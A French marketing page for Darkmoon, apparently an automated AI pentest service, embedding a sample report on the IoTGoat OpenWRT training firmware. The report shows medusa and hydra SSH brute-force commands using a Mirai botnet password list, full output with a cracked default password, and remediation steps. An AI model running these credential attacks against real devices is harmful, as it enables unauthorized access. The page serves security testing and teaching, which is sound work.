/ SERVICES

Sécurisez vos systèmes au quotidien, sans compromis sur la vitesse et la précision

Protection
forensique
Expertise
intrusion
cybersécurité
détection
brute force
faille
Protection
forensique
Expertise
intrusion
cybersécurité
détection
brute force
faille
intrusion
Efficiency
Innovation
Accessibility
Integration
Transparency
Resilience
Empowerment
intrusion
Efficiency
Innovation
Accessibility
Integration
Transparency
Resilience
Empowerment
/ comment ça marche

Vos ennemis ont une stratégie, désormais vous aussi

Ce que les services classiques ne proposes pas, Darkmoon le fait. Vos failles sont ciblées et vos données protégées.

Chez Darkmoon, nous savons que la cybersécurité ne doit pas être une contrainte, mais un levier d’amélioration continue. Contrairement aux solutions classiques qui noient les équipes sous des rapports techniques complexes et des listes de vulnérabilités anxiogènes, nous rendons la sécurité accessible, engageante et actionnable.

Pentest Report – IoTGoat Firmware(OpenWRT)

Introduction

Ce rapport détaille l’analyse offensive réalisée sur le firmware IoTGoat, basé sur OpenWRT, déployé dans un environnement IoT.

Ce rapport intègre toutes les sorties CLI complètes, ainsi que des stratégies d’exploitation précises et des recommandations de remédiation pédagogiques, avec des étapes concrètes et des commandes détaillées pour protéger l’infrastructure et les utilisateurs existants, conformément aux recommandations OWASP et aux guides NIST.

Tableau d'un scan Darkmoon

Pentest Report – IoTGoat Firmware(OpenWRT)

Description

Le firmware contient des utilisateurs avec des identifiants codés en dur, stockés dans /etc/passwd et /etc/shadow avec un hachage de type MD5. Ces informations permettent à un attaquant de récupérer des hashes vulnérables et de les cracker par force brute.

Impact

Obtention d’un accès privilégié et possibilité d’escalade de privilèges en compromettant ces comptes.

Proof: Sortie CLI complète

admin@darkmoon:~# medusa -u iotgoatuser -P ~/SecLists/Passwords/Malware/mirai-botnet_passwords.txt -h 192.168.1.113 -M ssh
ACCOUNT CHECK: [ssh] Host: 192.168.1.113 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: xc3511 (1 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.113 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: vizxv (2 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.113 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: admin (3 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.113 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: admin (4 of 60 complete)
[SNIP]
ACCOUNT CHECK: [ssh] Host: 192.168.1.113 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: zlxx. (42 of 60 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.113 (1 of 1, 0 complete) User: iotgoatuser (1 of 1, 0 complete) Password: 7ujMko0vizxv (43 of 60 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.113 User: iotgoatuser Password: 7ujMko0vizxv [SUCCESS]

admin@darkmoon:~# hydra -l iotgoatuser -P ~/SecLists/Passwords/Malware/mirai-botnet
_passwords.tx

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organization

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-24 19:02:00
[DATA] max 2 tasks per 1 server, overall 2 tasks, 60 login tries (l:1/p:60),
[DATA] attacking ssh://192.168.1.113:22/
[22][ssh] host: 192.168.1.113 login: iotgoatuser password: 7ujMko0vizxv
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-24 19:02:11

Pentest Strategy

  • Extraire le firmware, analyser les fichiers systèmes et récupérer les identifiants stockés en clair.
  • Utiliser des outils de cracking (medusa, hydra, john) avec des wordlists spécifiques pour valider l’authentification via SSH.

Corrective Actions – Remédiation par Security by Design

  • Renforcer les identifiants des comptes existants
  • Remplacer les mots de passe par défaut par des mots de passe complexes générés aléatoirement. Par exemple, connectez-vous en SSH et lancez :
    • admin@darkmoon:~# passwd root

(Suivre l’invite pour définir un nouveau mot de passe robuste utilisant SHA-512.)

  • Migrer vers une gestion centralisée des identités
  • Installer et configurer un service PAM ou un serveur RADIUS pour l’authentification centralisée.
  • Exemple sur OpenWRT (si supporté) :
    • admin@darkmoon:~# opkg update && opkg install freeradius3
  • Activer l’authentification par clé SSH
  • Générer une paire de clés sur votre poste de gestion et transférer la clé publique dans /etc/dropbear/authorized_keys :
    • admin@darkmoon:~# dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
    • admin@darkmoon:~# cat ~/.ssh/id_rsa.pub >> /etc/dropbear/authorized_keys
  • Réviser le firmware
  • Modifier le processus de build pour ne plus inclure d’identifiants par défaut, en intégrant une configuration sécurisée dès l’installation.

Global Recommendations

  • Renforcer l’authentification et la gestion des identités
    • Remplacer les mots de passe par défaut par des mots de passe complexes et uniques.
    • Mettre en place l’authentification par clé SSH et, si possible, une gestion centralisée des identités (PAM/RADIUS).

/ POURQUOI DARKMOON

Simplifiez vos tests de sécurité, du scan au rapport

/ pentest traditionnel

Scans partiels et déconnectés du réel
Tests rapidement obsolètes
Relecture de rapport
vulnerabilites connues
chronophage
Coût par pentesteur

/ pentest DARKMOON

Darkmoon tick ok
Moteur offensif 100 % autonome
Darkmoon tick ok
Raisonnement tactique intégré
Darkmoon tick ok
Résultats concrets et validés
Darkmoon tick ok
Correctifs livrés clé en main
Darkmoon tick ok
Failles 0 days
Darkmoon tick ok
Conformité ISO 27001 / NIST / ESPB
/ notre MÉTHODE

Une solution conçue pour penser comme un attaquant.

Choix du type
de scan

L'utilisateur choisit un scope de pentest (web, système, réseau, ints), avec la possibilité de sélectionner une ou plusieurs options ainsi que ses cibles (une adresse IP ou un domaine).

Exécution du
scan et rapport

Darkmoon scanne les cibles en utilisant des outils comme NMAP et Burp Suite, identifiant les vulnérabilités. Un rapport sur les failles trouvées est généré.

Création automatisée
de scénarios

Darkmoon génère automatiquement des scénarios de pentest basés sur les résultats du scan (ex : injection SQL) afin d’exploiter les failles potentielles.

Exploitation des
failles de sécurité

Si une vulnérabilité est exploitable, Darkmoon exécute des scripts pour l’exploiter et récupérer des données sensibles.

Exécution des tests
et rapport final

L'utilisateur lance les scénarios de pentest, qui s'exécutent de manière asynchrone. Tous les résultats sont compilés dans un rapport complet en PDF.

/ Foire Aux Questions

ce que vous cherchez se trouve peut-être ici

Qu’est-ce que Darkmoon ?

Une suite de pentest automatisé alliant expertise, IA et émulation, qui détecte, exploite et fournit remédiations clé en main.

Qu’est-ce qui me prouve que Darkmoon est à la hauteur ?

Les fondateurs ont travaillé en tant qu’expert cybersécurité pour les plus grands noms de l’industrie : Microsoft, IBM, Airbus, Pierre Fabre, CNRS, SEMTECH.  Darkmoon est reconnu JEI et adhérent Cyber’Occ depuis plusieurs années.

Et la conformité réglementaire ?

Darkmoon vous accompagne dans la mise en conformité : RGPD, ISO 27001, NIS, ESPB, PCI-DSS, OWASP, MITRE ATT&CK. Audit d’écart, plan d’action priorisé, livrables exploitables et evidence pack pour certifications.

Et si ça casse notre prod ?

Nous testons uniquement sur environnements de recette ou isolés, avec règles d’engagement précises. Arrêt d’urgence (Kill-switch), sauvegardes (snapshots) et validations humaine éliminent le risque en production.

Nos devs vont-ils pouvoir actionner ?

Oui. Darkmoon fournit scripts de remédiation prêts à l’emploi (Bash, PowerShell, Terraform), tickets JIRA/GitLab, et ateliers pratiques pour les équipes internes.

Pourquoi Darkmoon se démarque du secteur ?

Automatisation exhaustive multi-domaines (Web, AD, Cloud, IoT, réseau), rapidité 100× supérieure, corrélation MITRE/CVE, outputs orientés décision et action, coûts réduits.

Comment Darkmoon automatise la détection de failles ?

Reconnaissance active, SAST/DAST, fuzzing, IA pour prioriser, corrélation multi-sources et scénarios MITRE ATT&CK. Résultats rapides et exploitables.

Quels environnements peuvent être testés par Darkmoon ?

Windows, Linux, Cloud (AWS, Azure, GCP), Active Directory, réseaux, API/web, Android/iOS, IoT/SCADA, Kubernetes/Docker.